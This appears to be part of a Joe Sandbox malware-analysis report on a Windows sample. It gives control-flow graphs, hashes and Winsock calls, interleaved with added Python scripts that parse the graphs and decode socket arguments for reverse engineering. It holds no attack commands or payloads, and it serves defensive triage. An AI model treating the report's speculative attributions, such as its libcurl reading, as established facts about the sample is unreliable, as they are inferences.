1572 12fd6c2-12fd6db call 12fca30 1568->1572 1576 12fd558-12fd55e 1569->1576 1569->1577 1617 12fd9d3-12fd9d7 1571->1617 1572->1550 1623 12fd53e-12fd54b 1573->1623 1624 12fd531-12fd536 1573->1624 1591 12fd386-12fd388 1574->1591 1599 12fdae5-12fdaf8 1576->1599 1600 12fd564-12fd572 1576->1600 1577->1591 1578->1591 1579->1591 1580->1591 1602 12fdabb-12fdac6 1581->1602 1603 12fd354-12fd35f 1581->1603 1582->1591 1583->1555 1607 12fdab6 1583->1607 1597 12fd8cd-12fd8dd 1584->1597 1598 12fdb80-12fdb82 1584->1598 1605 12fdb7c-12fdb7e 1585->1605 1606 12fd629-12fd637 1585->1606 1587->1591 1588->1591 1589->1550 1590->1550 1591->1549 1622 12fd38e 1591->1622 1613 12fd8df-12fd8e2 1597->1613 1614 12fd8e9-12fd8f8 1597->1614 1612 12fdb84-12fdb97 call 12fb9b0 1598->1612 1599->1591 1615 12fdcb8-12fdcba 1600->1615 1616 12fd578-12fd588 1600->1616 1603->1574 1618 12fd361-12fd369 1603->1618 1605->1612 1620 12fd639-12fd63c 1606->1620 1621 12fd643-12fd650 1606->1621 1607->1602 1613->1614 1626 12fd8fe-12fd90f 1614->1626 1627 12fdc7a-12fdc94 call 12fb9b0 1614->1627 1628 12fdcbc-12fdcc7 1615->1628 1629 12fdcd3-12fdcf3 1615->1629 1616->1591 1617->1550 1630 12fd36f-12fd37c 1618->1630 1631 12fdb6c-12fdb77 1618->1631 1620->1621 1632 12fdc99-12fdcb3 call 12fb9b0 1621->1632 1633 12fd656-12fd667 1621->1633 1622->1545 1623->1591 1624->1623 1635 12fd915-12fd91a 1626->1635 1636 12fdc61-12fdc6a 1626->1636 1627->1632 1628->1629 1629->1591 1630->1574 1631->1591 1632->1617 1639 12fdafd-12fdb06 1633->1639 1640 12fd66d-12fd681 call 12fcc70 1633->1640 1641 12fdb3c-12fdb3f 1635->1641 1642 12fd920-12fd95a call 12fcc70 1635->1642 1636->1627 1639->1641 1640->1617 1641->1636 1646 12fdb45 1641->1646 1642->1617 1646->1631
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$Inf$NaN
                                                        • API String ID: 0-141429178
                                                        • Opcode ID: 62135a2553316bed519f0bbc54b1e03a48642683407f16f137a949377bd930f1
                                                        • Instruction ID: b5a9495c13ebd7d0b0f8c8f88310bd7b283b28c95dcce2e7ca7b2c779275d5f1
                                                        • Opcode Fuzzy Hash: 62135a2553316bed519f0bbc54b1e03a48642683407f16f137a949377bd930f1
                                                        • Instruction Fuzzy Hash: 12F1C07162C39A8BD7218F68C0507ABFBE1BB85314F148A3DDBDD87381D77599058B82

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1750 f77770-f7778e 1751 f777b6-f777c2 recv 1750->1751 1752 f77790-f77797 1750->1752 1754 f777c4-f777d9 call f772a0 1751->1754 1755 f7782e-f77832 1751->1755 1752->1751 1753 f77799-f777a1 1752->1753 1757 f777a3-f777b4 1753->1757 1758 f777db-f77829 call f772a0 call f7cb20 call 12f8c50 1753->1758 1754->1755 1757->1754 1758->1755
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: recv
                                                        • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                        • API String ID: 1507349165-640788491
                                                        • Opcode ID: 4663536b931c47bb7cb12badac4a2a315f10719633b40806686d67604c73e6b6
                                                        • Instruction ID: b00515227c5c19abffba0b7d29e93652f52d16abe6c27ee0f87cf2b40cb62f85
                                                        • Opcode Fuzzy Hash: 4663536b931c47bb7cb12badac4a2a315f10719633b40806686d67604c73e6b6
                                                        • Instruction Fuzzy Hash: 0B117AB5918304BBD320BA519C5AE277B9CEB86B6CF45951EBC0C27341D261AC01D6F3

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1769 f775e0-f775ed 1770 f77607-f77629 socket 1769->1770 1771 f775ef-f775f6 1769->1771 1772 f7763f-f77642 1770->1772 1773 f7762b-f7763c call f772a0 1770->1773 1771->1770 1774 f775f8-f775ff 1771->1774 1773->1772 1775 f77643-f77699 call f772a0 call f7cb20 call 12f8c50 1774->1775 1776 f77601-f77602 1774->1776 1776->1770
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        • Associated: 00000000.00000002.2531183229.0000000000F70000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.000000000154D000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B1000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531201882.00000000016B3000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531648796.00000000016B6000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001843000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001950000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001959000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A2C000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A34000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531667709.0000000001A44000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2531959352.0000000001A45000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532071843.0000000001C01000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.2532093424.0000000001C03000.00000080.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f70000_CMpuGis28l.jbxd
                                                        Similarity
                                                        • API ID: socket
                                                        • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                        • API String ID: 98920635-842387772
                                                        • Opcode ID: 95c6ff8a1c24b2718b44b957f9b3755ca957aae65b5f94f8ef81698ab53ed886
                                                        • Instruction ID: ccc5f4645d8a8c5feb2fef2f10761a5b79ac9569828a4616d06d7979b3ffafd3
                                                        • Opcode Fuzzy Hash: 95c6ff8a1c24b2718b44b957f9b3755ca957aae65b5f94f8ef81698ab53ed886
                                                        • Instruction Fuzzy Hash: 8411EF71A5030177CB202A396C16F9B3B84EF81778F41581AFC189A282D221C860D7D2

                                                        Control-flow Graph (edge list of the graph image; a node is "id start-end [call addr | api]", an edge is "id->id"; the image's Executed / Not Executed colouring is not preserved in the text)
                                                        control_flow_graph 1878 faa150-faa159 1879 faa15f-faa17b 1878->1879 1880 faa250 1878->1880 1881 faa249-faa24f 1879->1881 1882 faa181-faa1ce getsockname 1879->1882 1881->1880 1883 faa1d0-faa1f5 call f8d090 1882->1883 1884 faa1f7-faa214 call faef30 1882->1884 1891 faa240-faa246 call fb4f40 1883->1891 1884->1881 1889 faa216-faa23b call f8d090 1884->1889 1889->1891 1891->1881
                                                        APIs
                                                        • getsockname.WS2_32(?,?,00000080), ref: 00FAA1C7
                                                        Strings
                                                        • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00FAA23B
                                                        • getsockname() failed with errno %d: %s, xrefs: 00FAA1F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                        • API String ID: 3358416759-2605427207
                                                        • Opcode ID: 357ec18704a2d56ecda9453b2daeacb75bf03132a4bba2036765bf0cb11e7bbe
                                                        • Instruction ID: 55973e3a4a3063761903c4df4f2ad4848fb5476c6b36de69259e50dcdacecd7b
                                                        • Opcode Fuzzy Hash: 357ec18704a2d56ecda9453b2daeacb75bf03132a4bba2036765bf0cb11e7bbe
                                                        • Instruction Fuzzy Hash: AB21DB71C48680BAF7219B19DC46FE673ACEF91338F044614F99853151FB32699987E2
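The control_flow_graph line above is the sandbox's graph image flattened into a token stream, which stops being readable by eye once a function has more than a handful of blocks. The parser below is an added example, not code from the report or from the sample, that rebuilds nodes and edges from that stream and answers the questions a reverse engineer asks first: where the function enters and exits, which blocks call an imported API or an internal routine, and which path reaches each call. Its input is the getsockname() wrapper's graph, copied verbatim as constructed test data; the token conventions it assumes (decimal block id, hex address range, "call <addr>" for an internal call, a bare name for an import, "a->b" for an edge) are read off the line above and are not documented by the sandbox.

```python
import re
from collections import deque

# Constructed input: the getsockname() wrapper (blocks faa150-faa250), copied verbatim
# from the report's control_flow_graph line. Token conventions are inferred, not documented.
CFG_TEXT = (
    "1878 faa150-faa159 1879 faa15f-faa17b 1878->1879 1880 faa250 1878->1880 "
    "1881 faa249-faa24f 1879->1881 1882 faa181-faa1ce getsockname 1879->1882 "
    "1881->1880 1883 faa1d0-faa1f5 call f8d090 1882->1883 "
    "1884 faa1f7-faa214 call faef30 1882->1884 "
    "1891 faa240-faa246 call fb4f40 1883->1891 1884->1881 "
    "1889 faa216-faa23b call f8d090 1884->1889 1889->1891 1891->1881"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")


def parse_cfg(text):
    """Return ({node_id: {start, end, calls}}, [(src, dst), ...]) from the token stream.

    A node is "<id> <start>[-<end>]" followed by zero or more annotations
    ("call <addr>" for an internal call, a bare name for an imported API);
    an edge is "<id>-><id>". Ids are decimal, addresses hex.
    """
    tokens = text.split()
    nodes, edges = {}, []
    current, i = None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
            current = None
            i += 1
        elif tok.isdigit():
            # the token after a node id is always its address range (hex)
            nid, rng = int(tok), tokens[i + 1]
            start, _, end = rng.partition("-")
            nodes[nid] = {"start": int(start, 16), "end": int(end or start, 16), "calls": []}
            current = nid
            i += 2
        else:
            if current is not None and tok != "call":
                nodes[current]["calls"].append(tok)
            i += 1
    return nodes, edges


def successors(edges):
    succ = {}
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
    return succ


def reachable(edges, entry):
    """Breadth-first set of blocks reachable from entry (dead blocks = not in this set)."""
    succ, seen, todo = successors(edges), set(), deque([entry])
    while todo:
        node = todo.popleft()
        if node not in seen:
            seen.add(node)
            todo.extend(succ.get(node, []))
    return seen


def simple_paths(edges, src, dst, limit=50):
    """All loop-free paths src->dst, capped so large graphs stay tractable."""
    succ, found = successors(edges), []

    def walk(path):
        if len(found) >= limit:
            return
        if path[-1] == dst:
            found.append(list(path))
            return
        for nxt in succ.get(path[-1], []):
            if nxt not in path:
                path.append(nxt)
                walk(path)
                path.pop()

    walk([src])
    return found


def summarize(text):
    nodes, edges = parse_cfg(text)
    entry = min(nodes, key=lambda n: nodes[n]["start"])  # lowest address = function start
    succ = successors(edges)
    calls, paths = {}, {}
    for nid, node in nodes.items():
        span = f"{node['start']:x}-{node['end']:x}"
        for callee in node["calls"]:
            calls.setdefault(callee, []).append(span)
            paths[f"{callee}@{node['start']:x}"] = simple_paths(edges, entry, nid)
    return {
        "entry": entry,
        "exits": sorted(n for n in nodes if n not in succ),
        "unreachable": sorted(set(nodes) - reachable(edges, entry)),
        "calls": calls,
        "paths_to_calls": paths,
    }


if __name__ == "__main__":
    report = summarize(CFG_TEXT)
    print("entry block:", report["entry"], "exit blocks:", report["exits"])
    for callee, spans in report["calls"].items():
        print(f"{callee:12s} in {', '.join(spans)}")
    for key, plist in report["paths_to_calls"].items():
        print(key, "reached via", plist)
```

Run on this graph it reports a single entry (1878 at faa150) and a single exit (1880 at faa250), the getsockname() call at faa181-faa1ce reached via 1878->1879->1882, and the two f8d090 calls sitting on the failure edges out of 1882 and 1884, which is consistent with the string xrefs above (the "getsockname() failed" string at faa1f0 and the "ssloc inet_ntop() failed" string at faa23b both fall inside those blocks).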

                                                        Control-flow Graph (edge list of the graph image; a node is "id start-end [call addr | api]", an edge is "id->id"; the image's Executed / Not Executed colouring is not preserved in the text)
                                                        control_flow_graph 1898 f8d5e0-f8d5ee 1899 f8d5f0-f8d604 call f8d690 1898->1899 1900 f8d652-f8d662 WSAStartup 1898->1900 1906 f8d61b-f8d651 call f97620 1899->1906 1907 f8d606-f8d614 1899->1907 1902 f8d670-f8d676 1900->1902 1903 f8d664-f8d66f 1900->1903 1902->1899 1904 f8d67c-f8d68d 1902->1904 1907->1906 1912 f8d616 1907->1912 1912->1906
                                                        APIs
                                                        • WSAStartup.WS2_32(00000202), ref: 00F8D65A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Similarity
                                                        • API ID: Startup
                                                        • String ID: if_nametoindex$iphlpapi.dll
                                                        • API String ID: 724789610-3097795196
                                                        • Opcode ID: 6be46400255d39a613ec05615403eee1bcecfd415236b9746f627a273b26794e
                                                        • Instruction ID: df5dc4f26227a485bd17b26c58a6a9044574ab38842dedad91cf2a2ff34a0100
                                                        • Opcode Fuzzy Hash: 6be46400255d39a613ec05615403eee1bcecfd415236b9746f627a273b26794e
                                                        • Instruction Fuzzy Hash: 75019ED0D8038542FB207F389C2B3A636A86F11344F89182CDC48961C3F76CC999D393

                                                        Control-flow Graph (edge list of the graph image; a node is "id start-end [call addr | api]", an edge is "id->id"; the image's Executed / Not Executed colouring is not preserved in the text)
                                                        control_flow_graph 1914 103aa30-103aa64 1916 103ab04-103ab09 1914->1916 1917 103aa6a-103aaa7 call 102e730 1914->1917 1918 103ae80-103ae89 1916->1918 1921 103aaa9-103aabd 1917->1921 1922 103ab0e-103ab13 1917->1922 1924 103ab18-103ab50 1921->1924 1925 103aabf-103aac7 1921->1925 1923 103ae2e 1922->1923 1926 103ae30-103ae4a call 102ea60 call 102ebf0 1923->1926 1930 103ab58-103ab6d 1924->1930 1925->1923 1927 103aacd-103ab02 1925->1927 1939 103ae75-103ae7d 1926->1939 1940 103ae4c-103ae57 1926->1940 1927->1930 1933 103ab96-103abab socket 1930->1933 1934 103ab6f-103ab73 1930->1934 1933->1923 1938 103abb1-103abc5 1933->1938 1934->1933 1936 103ab75-103ab8f 1934->1936 1936->1938 1952 103ab91 1936->1952 1941 103abd0-103abed ioctlsocket 1938->1941 1942 103abc7-103abca 1938->1942 1939->1918 1944 103ae59-103ae5e 1940->1944 1945 103ae6e-103ae74 1940->1945 1947 103ac10-103ac14 1941->1947 1948 103abef-103ac0a 1941->1948 1942->1941 1946 103ad2e-103ad39 1942->1946 1944->1945 1955 103ae60-103ae6c 1944->1955 1945->1939 1953 103ad52-103ad56 1946->1953 1954 103ad3b-103ad4c 1946->1954 1949 103ac37-103ac41 1947->1949 1950 103ac16-103ac31 1947->1950 1948->1947 1960 103ae29 1948->1960 1958 103ac43-103ac46 1949->1958 1959 103ac7a-103ac7e 1949->1959 1950->1949 1950->1960 1952->1923 1953->1960 1961 103ad5c-103ad6b 1953->1961 1954->1953 1954->1960 1955->1939 1963 103ad04-103ad08 1958->1963 1964 103ac4c-103ac51 1958->1964 1965 103ac80-103ac9b 1959->1965 1966 103ace7-103ad03 1959->1966 1960->1923 1968 103ad70-103ad78 1961->1968 1963->1946 1972 103ad0a-103ad28 1963->1972 1964->1963 1973 103ac57-103ac78 1964->1973 1965->1966 1974 103ac9d-103acc1 1965->1974 1966->1963 1970 103ada0-103adae connect 1968->1970 1971 103ad7a-103ad7f 1968->1971 1977 103adb3-103adcf 1970->1977 1971->1970 1975 103ad81-103ad99 1971->1975 1972->1946 1972->1960 1978 103acc6-103acd7 1973->1978 1974->1978 1975->1977 1985 103add5-103add8 1977->1985 1986 103ae8a-103ae91 1977->1986 1978->1960 1984 103acdd-103ace5 1978->1984 1984->1963 1984->1966 1987 103ade1-103adf1 1985->1987 1988 103adda-103addf 1985->1988 1986->1926 1989 103adf3-103ae07 1987->1989 1990 103ae0d-103ae12 1987->1990 1988->1968 1988->1987 1989->1990 1996 103aea8-103aead 1989->1996 1991 103ae14-103ae17 1990->1991 1992 103ae1a-103ae1c call 103af70 1990->1992 1991->1992 1995 103ae21-103ae23 1992->1995 1997 103ae93-103ae9d 1995->1997 1998 103ae25-103ae27 1995->1998 1996->1926 1999 103aeaf-103aeb1 call 102e760 1997->1999 2000 103ae9f-103aea6 call 102e7c0 1997->2000 1998->1926 2004 103aeb6-103aebe 1999->2004 2000->2004 2005 103aec0-103aedb call 102e180 2004->2005 2006 103af1a-103af1f 2004->2006 2005->1926 2009 103aee1-103aeec 2005->2009 2006->1926 2010 103af02-103af06 2009->2010 2011 103aeee-103aeff 2009->2011 2012 103af08-103af0b 2010->2012 2013 103af0e-103af15 2010->2013 2011->2010 2012->2013 2013->1918
                                                        APIs
                                                        • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0103AB9A
                                                        • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0103ABE4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Similarity
                                                        • API ID: ioctlsocketsocket
                                                        • String ID:
                                                        • API String ID: 416004797-0
                                                        • Opcode ID: 278c3af8484f743dc248139b4941e2f9a01c8cd3f667f2c4f1fa449267b615fd
                                                        • Instruction ID: aa0b393d8b8ed1410f7822b200f990d632b580611c5410da0ef3bd59a1986029
                                                        • Opcode Fuzzy Hash: 278c3af8484f743dc248139b4941e2f9a01c8cd3f667f2c4f1fa449267b615fd
                                                        • Instruction Fuzzy Hash: 84E1A170604302DBEB20CF28C884B6B7BE9EF89314F044A6DEAD9DB291D775D944CB52
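The Winsock arguments the report prints are raw stack values, so they have to be decoded before they say anything about the sample's behaviour: WSAStartup(00000202) requests Winsock 2.2; ioctlsocket(..., 8004667E, 00000001) is FIONBIO with *argp = 1, i.e. the freshly created socket is switched to non-blocking before connect() (the non-blocking connect pattern, which is why the connect() block further down is immediately followed by WSAGetLastError); and the 00000080 passed as namelen to getsockname() is a 128-byte SOCKADDR_STORAGE, so the code is IPv6-capable. The script below is an added example, not part of the report or of the sample. It re-derives the control code from the _IOW/_IOR macros in winsock2.h instead of matching a hex literal, and parses the report's own "APIs" lines, copied above as constructed input (the "?" placeholders are stack slots the sandbox could not resolve). A further observation, made here from the strings and not stated by the report: "FD %s:%d socket() = %d", "FD %s:%d sclose(%d)", "LIMIT %s:%d %s reached memlimit", "getsockname() failed with errno %d: %s", "ssloc inet_ntop() failed with errno %d: %s" and the runtime lookup of if_nametoindex in iphlpapi.dll are the messages libcurl's memdebug.c, cf-socket.c and system_win32.c emit, which points to a statically linked libcurl built with its CURLDEBUG tracing rather than hand-written socket code.

```python
import re

# Winsock ioctl encoding from <winsock2.h> (_IO / _IOR / _IOW macros).
IOCPARM_MASK, IOC_VOID, IOC_OUT, IOC_IN = 0x7F, 0x20000000, 0x40000000, 0x80000000


def winsock_ioctl(direction, group, number, size=0):
    """Build a control code exactly the way the header macros do."""
    return direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | number


# Derived from the macro definitions rather than typed in as hex, so the table is checkable.
KNOWN_IOCTLS = {
    winsock_ioctl(IOC_IN, "f", 126, 4): "FIONBIO",     # _IOW('f', 126, u_long)
    winsock_ioctl(IOC_OUT, "f", 127, 4): "FIONREAD",   # _IOR('f', 127, u_long)
    winsock_ioctl(IOC_OUT, "s", 7, 4): "SIOCATMARK",   # _IOR('s', 7, u_long)
}
DIRECTIONS = {IOC_IN: "IOC_IN", IOC_OUT: "IOC_OUT", IOC_IN | IOC_OUT: "IOC_INOUT", IOC_VOID: "IOC_VOID"}


def decode_ioctl(code):
    """Split a control code into its direction, group letter, number and argp size."""
    return {
        "name": KNOWN_IOCTLS.get(code, "unknown"),
        "dir": DIRECTIONS.get(code & 0xE0000000, "?"),
        "group": chr((code >> 8) & 0xFF),
        "number": code & 0xFF,
        "size": (code >> 16) & IOCPARM_MASK,
    }


def wsa_version(word):
    """wVersionRequested is MAKEWORD(major, minor): major in the low byte."""
    return word & 0xFF, (word >> 8) & 0xFF


API_LINE_RE = re.compile(r"^(?P<fn>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")


def parse_api_line(line):
    """Parse one 'APIs' entry of the report; an unresolved '?' slot becomes None."""
    m = API_LINE_RE.match(line.strip().lstrip("• ").strip())
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    args = [None if a.strip() == "?" else int(a.strip(), 16)
            for a in m["args"].split(",") if a.strip()]
    return {"fn": m["fn"], "dll": m["dll"], "args": args, "ref": int(m["ref"], 16)}


def annotate(line):
    """Human-readable reading of the call, for the APIs this report section lists."""
    call = parse_api_line(line)
    fn, args = call["fn"], call["args"]
    if fn == "WSAStartup":
        major, minor = wsa_version(args[0])
        return f"WSAStartup: requests Winsock {major}.{minor}"
    if fn == "ioctlsocket":
        d = decode_ioctl(args[1])
        desc = f"ioctlsocket: {d['name']} ({d['dir']}, group '{d['group']}', #{d['number']}, {d['size']}-byte argp)"
        if d["name"] == "FIONBIO" and args[2] is not None:
            desc += ", *argp=%d -> %s" % (args[2], "non-blocking" if args[2] else "blocking")
        return desc
    if fn == "getsockname":
        note = " (sizeof SOCKADDR_STORAGE, so IPv6-capable)" if args[2] == 128 else ""
        return f"getsockname: namelen {args[2]} bytes{note}"
    if fn == "gethostname":
        return f"gethostname: {args[1]}-byte name buffer"
    return f"{fn}: {args}"


# Constructed input: the API lines of this report section, copied verbatim.
REPORT_LINES = [
    "• WSAStartup.WS2_32(00000202), ref: 00F8D65A",
    "• socket.WS2_32(FFFFFFFF,?,00000000), ref: 0103AB9A",
    "• ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0103ABE4",
    "• connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0103B29E,?,00000000,?,?), ref: 0103B0B9",
    "• gethostname.WS2_32(00000000,00000040), ref: 01024AA5",
    "• getsockname.WS2_32(?,?,00000080), ref: 0103AFD1",
]

if __name__ == "__main__":
    for line in REPORT_LINES:
        print(f"{parse_api_line(line)['ref']:08X}  {annotate(line)}")
```

Because KNOWN_IOCTLS is generated from the macros, a control code that is not in the table still decodes into its fields (direction, group letter, number, argp size), which is enough to look it up in the header by hand.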
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Similarity
                                                        • API ID: closesocket
                                                        • String ID: FD %s:%d sclose(%d)
                                                        • API String ID: 2781271927-3116021458
                                                        • Opcode ID: 2f1c9da16d549f3e2e1fdf4cac6a19035e5cc36702ccb47b045fbda05a1452d2
                                                        • Instruction ID: d39d21ba57c17dfe137aa08d76afe93c72cef1b1821c780e14015a698354f053
                                                        • Opcode Fuzzy Hash: 2f1c9da16d549f3e2e1fdf4cac6a19035e5cc36702ccb47b045fbda05a1452d2
                                                        • Instruction Fuzzy Hash: B8D05E32919321AB8630655AAC49C4B7AA8DEC6F60B0A486AFD586B205D1209C0497E3
                                                        APIs
                                                        • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0103B29E,?,00000000,?,?), ref: 0103B0B9
                                                        • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,01023C41,00000000), ref: 0103B0C1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Similarity
                                                        • API ID: ErrorLastconnect
                                                        • String ID:
                                                        • API String ID: 374722065-0
                                                        • Opcode ID: 9358488b3752b0c05753159668aa81495e057eb7caea5373b3f5d98a28f18f77
                                                        • Instruction ID: c98cc97f998aafa2e2808863cb3f448859c91f5787e3bbdba6ce529a67904d5c
                                                        • Opcode Fuzzy Hash: 9358488b3752b0c05753159668aa81495e057eb7caea5373b3f5d98a28f18f77
                                                        • Instruction Fuzzy Hash: 9A0188323042049BDB605A69DD44F6AF7DDFFC9268F040B54F9B8931D1D726E9508751
                                                        APIs
                                                        • gethostname.WS2_32(00000000,00000040), ref: 01024AA5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Similarity
                                                        • API ID: gethostname
                                                        • String ID:
                                                        • API String ID: 144339138-0
                                                        • Opcode ID: f281d0800b716a46dfe3676a9d0b99d4adfd67b99c39d5fc61cbea85c2d09a48
                                                        • Instruction ID: 9dd7c64ceb32fc782da36c224390abb371d998c010c0e50d931cacd2935de82c
                                                        • Opcode Fuzzy Hash: f281d0800b716a46dfe3676a9d0b99d4adfd67b99c39d5fc61cbea85c2d09a48
                                                        • Instruction Fuzzy Hash: E451CDB06007218BF7729E29DD897667AE4AF01715F0418BDDACACA691E7B5E444CB02
                                                        APIs
                                                        • getsockname.WS2_32(?,?,00000080), ref: 0103AFD1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2531201882.0000000000F71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F70000, based on PE: true
                                                        Similarity
                                                        • API ID: getsockname
                                                        • String ID:
                                                        • API String ID: 3358416759-0
                                                        • Opcode ID: f7bdccd34e07be561def30eb58696b39a0b9769937fe945f04958f5c914402bc
                                                        • Instruction ID: 98dde901b56fffad57b3f7b5fc28d1b8da1f8c70a81972c6cff5a232d190ebf4
